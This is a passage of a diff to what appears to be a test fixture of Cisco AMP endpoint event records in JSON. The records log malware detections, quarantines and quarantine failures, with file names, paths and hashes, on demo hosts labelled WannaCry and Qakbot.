pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":907000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064606","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":907000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064605","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":907000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064607","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":891000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064604","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":876000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064603","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":845000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":798000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":767000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":751000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064600","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":735000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":423000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":6404,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":377000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064596","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} \ No newline at end of file +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6508397899087348000,"timestamp":1610659036,"timestamp_nanoseconds":295927133,"date":"2021-01-14T21:17:16+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.6A37D750F0-100.SBX.TG","detection_id":"6508397899087347713","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86","sha1":"5ca4bef8de6def53519d4b22632675bb4c1e470b","md5":"41476df3138717868118d8542cf3d1d6"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14930696955218,"timestamp":1610656706,"timestamp_nanoseconds":844899579,"date":"2021-01-14T20:38:26+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.E4FCCBFA69-95.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610656706,"start_date":"2021-01-14T20:38:26+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"},"parent":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":587000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6412680266518626319","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":494000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6412680266518626317","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":587000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626319","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"28242311.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"},"parent":{"process_id":7120,"disposition":"Malicious","file_name":"QuotaGroup.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014","sha1":"f504774b72acfb23a46217aec9c6559fd7e4df64","md5":"b5ede95ec8bc4ad6984758be42b152bd"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":572000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626318","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014","sha1":"f504774b72acfb23a46217aec9c6559fd7e4df64","md5":"b5ede95ec8bc4ad6984758be42b152bd"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":494000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626317","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"28242311.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"},"parent":{"process_id":4788,"disposition":"Malicious","file_name":"28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":478000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626316","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"28242311.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014","sha1":"f504774b72acfb23a46217aec9c6559fd7e4df64","md5":"b5ede95ec8bc4ad6984758be42b152bd"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":587000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6412680266518626318","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":494000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6412680266518626316","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} 